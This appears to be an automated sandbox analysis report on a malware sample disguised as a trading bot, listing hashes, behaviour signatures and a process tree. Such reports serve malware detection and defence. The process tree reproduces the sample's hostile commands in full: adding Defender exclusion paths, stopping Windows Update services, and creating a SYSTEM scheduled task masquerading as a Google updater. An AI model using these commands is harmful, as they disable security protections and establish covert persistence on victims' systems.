Analysis
-
max time kernel
103s -
max time network
43s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
09-07-2023 19:17
Static task
static1
Behavioral task
behavioral1
Sample
TRADINGBOTexe.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
TRADINGBOTexe.exe
Resource
win10v2004-20230703-en
General
-
Target
TRADINGBOTexe.exe
-
Size
9.9MB
-
MD5
5929435942fb70609a38af09caaf79c5
-
SHA1
6b724e7f68bb82c04397774dcf3a50b4217313f8
-
SHA256
24e0cad1fb1660de0d63c928343be126666e964e9a16fbb30350586258b0e146
-
SHA512
27bf0a66ab54b04a21df97f1867f81b9d77127dba0a4237288556af9ead3142be2b89f79d371b58094e2d3ff678b43c50325ff305173db599971113e34ac4f7e
-
SSDEEP
196608:DdUuyGgNKgQ/kgOFVo5QobOMwe3OPrzucNmwj3tgbXwFriutnnc0R2XxyxK7wOkw:DzJzkgO2Qotwe3OPrzucNmwj3tgbXwFl
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1956 created 1204 1956 TRADINGBOTexe.exe 20 PID 1956 created 1204 1956 TRADINGBOTexe.exe 20 PID 1956 created 1204 1956 TRADINGBOTexe.exe 20 PID 1956 created 1204 1956 TRADINGBOTexe.exe 20 PID 1956 created 1204 1956 TRADINGBOTexe.exe 20 -
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1956 set thread context of 1904 1956 TRADINGBOTexe.exe 38 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe TRADINGBOTexe.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2356 sc.exe 1020 sc.exe 1320 sc.exe 268 sc.exe 1552 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2112 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 2260 powershell.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 572 powershell.exe 1904 dialer.exe 1904 dialer.exe 1904 dialer.exe 1904 dialer.exe 1956 TRADINGBOTexe.exe 1956 TRADINGBOTexe.exe 1904 dialer.exe 1904 dialer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 1904 dialer.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1228 wrote to memory of 2356 1228 cmd.exe 33 PID 1228 wrote to memory of 2356 1228 cmd.exe 33 PID 1228 wrote to memory of 2356 1228 cmd.exe 33 PID 1228 wrote to memory of 1020 1228 cmd.exe 34 PID 1228 wrote to memory of 1020 1228 cmd.exe 34 PID 1228 wrote to memory of 1020 1228 cmd.exe 34 PID 1228 wrote to memory of 1320 1228 cmd.exe 35 PID 1228 wrote to memory of 1320 1228 cmd.exe 35 PID 1228 wrote to memory of 1320 1228 cmd.exe 35 PID 1228 wrote to memory of 268 1228 cmd.exe 36 PID 1228 wrote to memory of 268 1228 cmd.exe 36 PID 1228 wrote to memory of 268 1228 cmd.exe 36 PID 1228 wrote to memory of 1552 1228 cmd.exe 37 PID 1228 wrote to memory of 1552 1228 cmd.exe 37 PID 1228 wrote to memory of 1552 1228 cmd.exe 37 PID 1956 wrote to memory of 1904 1956 TRADINGBOTexe.exe 38 PID 1904 wrote to memory of 416 1904 dialer.exe 3 PID 1904 wrote to memory of 464 1904 dialer.exe 2 PID 572 wrote to memory of 2112 572 powershell.exe 41 PID 572 wrote to memory of 2112 572 powershell.exe 41 PID 572 wrote to memory of 2112 572 powershell.exe 41 PID 1904 wrote to memory of 472 1904 dialer.exe 1 PID 1904 wrote to memory of 480 1904 dialer.exe 8 PID 1904 wrote to memory of 596 1904 dialer.exe 9 PID 1904 wrote to memory of 672 1904 dialer.exe 11 PID 1904 wrote to memory of 756 1904 dialer.exe 10 PID 1904 wrote to memory of 808 1904 dialer.exe 13 PID 1904 wrote to memory of 852 1904 dialer.exe 12 PID 1904 wrote to memory of 988 1904 dialer.exe 14 PID 1904 wrote to memory of 300 1904 dialer.exe 15 PID 1904 wrote to memory of 744 1904 dialer.exe 16 PID 1904 wrote to memory of 1072 1904 dialer.exe 17 PID 1904 wrote to memory of 1112 1904 dialer.exe 18 PID 1904 wrote to memory of 1176 1904 dialer.exe 19 PID 1904 wrote to memory of 1204 1904 dialer.exe 20 PID 1904 wrote to memory of 1972 1904 dialer.exe 22 PID 1904 wrote to memory of 2000 1904 dialer.exe 23 PID 1904 wrote to memory of 832 1904 dialer.exe 24 PID 1904 wrote to memory of 1800 1904 dialer.exe 26 PID 1904 wrote to memory of 2708 1904 dialer.exe 44 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:472
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1800
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:852
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:832
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6CAE1DA-E89B-41E2-805D-2EDF9249278B} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:2708
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵PID:2892
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1176
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:988
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:300
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:744
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1072
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1972
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2000
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:416
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:480
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\TRADINGBOTexe.exe"C:\Users\Admin\AppData\Local\Temp\TRADINGBOTexe.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2356
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1020
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1320
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:268
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1552
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yubtcja#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2112
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2108
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD55929435942fb70609a38af09caaf79c5
SHA16b724e7f68bb82c04397774dcf3a50b4217313f8
SHA25624e0cad1fb1660de0d63c928343be126666e964e9a16fbb30350586258b0e146
SHA51227bf0a66ab54b04a21df97f1867f81b9d77127dba0a4237288556af9ead3142be2b89f79d371b58094e2d3ff678b43c50325ff305173db599971113e34ac4f7e
-
Filesize
2.9MB
MD51ece0f5cafb946c3a10f9fad4373189a
SHA1ef3ce65c1b280371c3d864c2e929a56830c06bfa
SHA2567e60850ae5d786768cc8eca9e65921a005c3fe3dc499e296ef4a16f80f696535
SHA512003794b5c7d642f97d63950fa605c676d6105fbe32549a17e63d90705718209dfc286f98f46d60338cbbd292db7367312e0928f85e53adc5ea46a6405891352a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5828b3dc640d630893fea12f05094195e
SHA1d000a05d341f884edc7dd749572f48d5f271b9a5
SHA2566bb6458d5a945c795a206d00c75adfb91317f8f64997dfa63945ccae9643dbee
SHA5126d1e40d1ba2bb3ca3706f275727ebaa7d45a831d3a75ef5cce6000c72515f1f73acc39bf3b72e364ba199f60c2364824323ab850838773942e593aa7cea3de73
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MQJKAQFT14GF0CZBGCAZ.temp
Filesize7KB
MD5828b3dc640d630893fea12f05094195e
SHA1d000a05d341f884edc7dd749572f48d5f271b9a5
SHA2566bb6458d5a945c795a206d00c75adfb91317f8f64997dfa63945ccae9643dbee
SHA5126d1e40d1ba2bb3ca3706f275727ebaa7d45a831d3a75ef5cce6000c72515f1f73acc39bf3b72e364ba199f60c2364824323ab850838773942e593aa7cea3de73
-
Filesize
9.9MB
MD55929435942fb70609a38af09caaf79c5
SHA16b724e7f68bb82c04397774dcf3a50b4217313f8
SHA25624e0cad1fb1660de0d63c928343be126666e964e9a16fbb30350586258b0e146
SHA51227bf0a66ab54b04a21df97f1867f81b9d77127dba0a4237288556af9ead3142be2b89f79d371b58094e2d3ff678b43c50325ff305173db599971113e34ac4f7e